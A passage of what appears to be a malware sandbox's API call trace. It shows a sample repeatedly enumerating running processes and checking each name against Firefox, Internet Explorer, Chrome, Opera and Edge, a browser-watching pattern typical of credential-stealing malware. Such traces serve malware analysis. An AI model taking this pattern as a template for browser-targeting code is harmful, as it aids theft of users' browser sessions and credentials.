lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0211.206] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.206] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0211.248] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0211.248] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0211.248] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0211.248] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0211.248] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0211.248] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0211.249] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0211.249] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0211.249] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0211.249] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0211.249] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0211.249] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0211.249] CloseHandle (hObject=0xe8) returned 1 [0211.250] Sleep (dwMilliseconds=0x3e8) [0212.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0212.320] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0212.320] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0212.320] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0212.320] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0212.321] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0212.321] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0212.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0212.321] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0212.321] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0212.321] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0212.321] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0212.321] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0212.321] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0212.322] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0212.322] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0212.322] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0212.322] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0212.322] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.322] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0212.322] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0212.322] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0212.322] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0212.322] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.322] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0212.323] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0212.323] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0212.323] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0212.323] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0212.323] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.323] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0212.323] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0212.323] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0212.323] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0212.324] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0212.324] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0212.324] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0212.324] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0212.324] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0212.324] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0212.324] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.324] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0212.325] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0212.325] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0212.325] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0212.325] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0212.325] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0212.325] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0212.325] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0212.325] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0212.325] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0212.325] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.325] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0212.326] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0212.326] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0212.326] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0212.326] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0212.326] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.326] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.326] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.326] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.326] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.326] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.326] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.327] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.327] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.327] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.327] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.327] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.327] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.328] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.328] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.329] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.329] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.329] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.329] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.329] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.329] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0212.329] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0212.329] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0212.329] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0212.329] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0212.329] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.330] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.330] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.330] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.330] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.330] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.330] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.331] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.331] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.331] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.331] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.331] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0212.331] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0212.331] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0212.331] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0212.331] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0212.331] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.331] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0212.332] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0212.332] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0212.332] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0212.332] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0212.332] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0212.332] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0212.332] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0212.332] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0212.332] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0212.332] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.332] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0212.333] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0212.333] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0212.333] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0212.333] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0212.333] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.333] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0212.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0212.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0212.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0212.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0212.336] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0212.336] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0212.336] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0212.336] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0212.336] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0212.336] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.336] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0212.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0212.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0212.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0212.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0212.337] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.337] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0212.337] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0212.337] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0212.337] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0212.337] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0212.337] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0212.338] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0212.338] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0212.338] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0212.338] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0212.338] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.338] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0212.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0212.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0212.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0212.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0212.339] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0212.339] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0212.339] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0212.339] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0212.339] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0212.339] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.339] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0212.340] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0212.340] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0212.340] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0212.340] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0212.340] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.340] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0212.341] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0212.341] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0212.341] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0212.341] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0212.341] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.341] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0212.341] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0212.341] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0212.341] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0212.341] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0212.341] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0212.341] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0212.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0212.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0212.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0212.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0212.342] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0212.342] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, 